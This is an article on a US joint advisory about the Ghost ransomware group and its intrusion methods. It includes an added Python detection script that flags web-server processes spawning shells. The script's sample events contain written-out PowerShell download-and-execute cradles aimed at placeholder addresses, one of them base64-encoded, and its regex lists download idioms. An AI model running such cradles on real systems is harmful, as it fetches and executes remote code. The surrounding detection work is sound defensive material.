US authorities have released new details on the activities of the “Ghost” ransomware group, believed to operate from China, in a recent joint advisory. According to the FBI, the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC), the group has compromised organizations in more than 70 countries.
Tracked under various aliases, including Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture, the Ghost ransomware group is unusual in being based in China rather than in the former Soviet states where most ransomware actors operate. Despite this geographical difference, its tactics closely resemble those of other ransomware operators in the cybercriminal underground.
The group typically gains initial access by exploiting known vulnerabilities in public-facing systems, such as Fortinet FortiOS appliances, Adobe ColdFusion servers, Microsoft SharePoint, and Microsoft Exchange. Once inside, Ghost actors upload a web shell to the compromised server and use the Windows Command Prompt and PowerShell to download and execute the Cobalt Strike Beacon on victim systems.
Ghost actors typically do not invest in long-term persistence within compromised networks. Instead, they move quickly from initial access to ransomware deployment, often on the same day as the intrusion. Cobalt Strike and other open-source tools are used for privilege escalation, credential access, lateral movement, and command and control within the network.
One distinctive aspect of Ghost's operations is the threat to sell exfiltrated data if the ransom is not paid. In practice, however, the group rarely exfiltrates significant volumes of sensitive data, such as intellectual property or personally identifiable information, that would cause major harm if leaked.
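The chain described above (web shell on a public-facing server, then cmd.exe or PowerShell used to fetch and run the Beacon) has a simple process-lineage signature: a web server worker spawning a shell whose command line contains a download cradle. The following detection logic is an added example written for this article; it is not code from the advisory or from any of the agencies named. It assumes process-creation telemetry flattened to JSON lines with the fields pid, image, parent_image and command_line (an assumed schema; Sysmon Event ID 1 or EDR fields map onto it), and the sample events, including the 203.0.113.0/24 documentation-range addresses, are constructed. It goes slightly beyond the text by also decoding PowerShell -EncodedCommand payloads, since the cradle is frequently hidden that way.

```python
"""Flag web-server worker processes spawning shells that fetch a second stage.

Input schema (assumed): JSON lines with pid, image, parent_image, command_line.
"""
import base64
import json
import re

# Worker processes of the public-facing apps named in the advisory: IIS
# (w3wp.exe) hosts Exchange and SharePoint; ColdFusion runs as coldfusion.exe.
# Assumed list; extend it for your own estate.
WEB_SERVER_PARENTS = {"w3wp.exe", "coldfusion.exe", "httpd.exe", "tomcat.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# PowerShell and LOLBin idioms used to pull a payload from a remote host.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|"
    r"net\.webclient|bitsadmin|certutil.*-urlcache|start-bitstransfer|"
    r"invoke-expression|\biex\b",
    re.IGNORECASE,
)
# -e / -ec / -enc / -EncodedCommand followed by base64 of a UTF-16LE script.
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)


def decode_encoded_command(command_line):
    """Return the script behind -EncodedCommand, or '' if absent or undecodable."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", "ignore")
    except ValueError:  # binascii.Error is a ValueError: bad alphabet or padding
        return ""


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the detection rules that fire for one process-creation event."""
    image = basename(event["image"])
    parent = basename(event["parent_image"])
    cmdline = event.get("command_line", "")
    rules = []
    shell_from_web = image in SHELLS and parent in WEB_SERVER_PARENTS
    if shell_from_web:
        rules.append("web_server_spawned_shell")
    decoded = decode_encoded_command(cmdline)
    if decoded:
        rules.append("encoded_powershell")
    if DOWNLOAD_CRADLE.search(cmdline) or DOWNLOAD_CRADLE.search(decoded):
        rules.append("download_cradle")
    if shell_from_web and "download_cradle" in rules:
        # Web shell -> cmd/PowerShell -> remote fetch: the full chain in the advisory.
        rules.append("webshell_stage2_download")
    return rules


def scan(jsonl_text):
    """Run classify() over JSON-lines telemetry and return only events with hits."""
    findings = []
    for line in jsonl_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        rules = classify(event)
        if rules:
            findings.append({"pid": event["pid"], "image": basename(event["image"]),
                             "parent": basename(event["parent_image"]), "rules": rules})
    return findings


# Constructed sample telemetry (not real events; IPs from a documentation range).
_ENCODED_STAGE2 = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/b')".encode("utf-16-le")
).decode("ascii")
SAMPLE_EVENTS = [
    {"pid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "command_line": "cmd.exe /c whoami"},
    {"pid": 101, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "command_line": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://203.0.113.7/a')\""},
    {"pid": 102, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\ColdFusion\bin\coldfusion.exe",
     "command_line": "powershell.exe -nop -w hidden -enc " + _ENCODED_STAGE2},
    {"pid": 103, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe Get-ChildItem C:\Logs"},
    {"pid": 104, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe Invoke-WebRequest https://203.0.113.9/patch.msi -OutFile patch.msi"},
]
SAMPLE_JSONL = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

if __name__ == "__main__":
    for f in scan(SAMPLE_JSONL):
        print(f["pid"], f["parent"], "->", f["image"], ", ".join(f["rules"]))
```

The lineage rule alone (web worker spawning a shell) is the high-confidence signal and is worth alerting on by itself; the download-cradle rule fires on legitimate admin activity too (pid 104 above), so treat it as a severity modifier rather than a stand-alone alert unless the parent is a web server.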
The group’s preference for targeting vulnerable organizations that lack robust security measures has led to a large number of small to medium-sized businesses, critical infrastructure providers, educational institutions, healthcare organizations, government agencies, religious groups, and technology and manufacturing companies falling victim to their attacks.
To mitigate the risks posed by the Ghost ransomware group, CISA has recommended several security measures for organizations to implement. These include regularly backing up data and storing backups separately from main systems, promptly patching known vulnerabilities, network segmentation to limit lateral movement, and implementing phishing-resistant multi-factor authentication for privileged and email accounts.
In conclusion, the new details provided by US authorities shed light on the tactics and activities of the Ghost ransomware group, highlighting the importance of strong cybersecurity measures to protect organizations from falling prey to such malicious actors. By enhancing baseline security practices and staying vigilant against evolving threats, businesses and institutions can better defend themselves against ransomware attacks.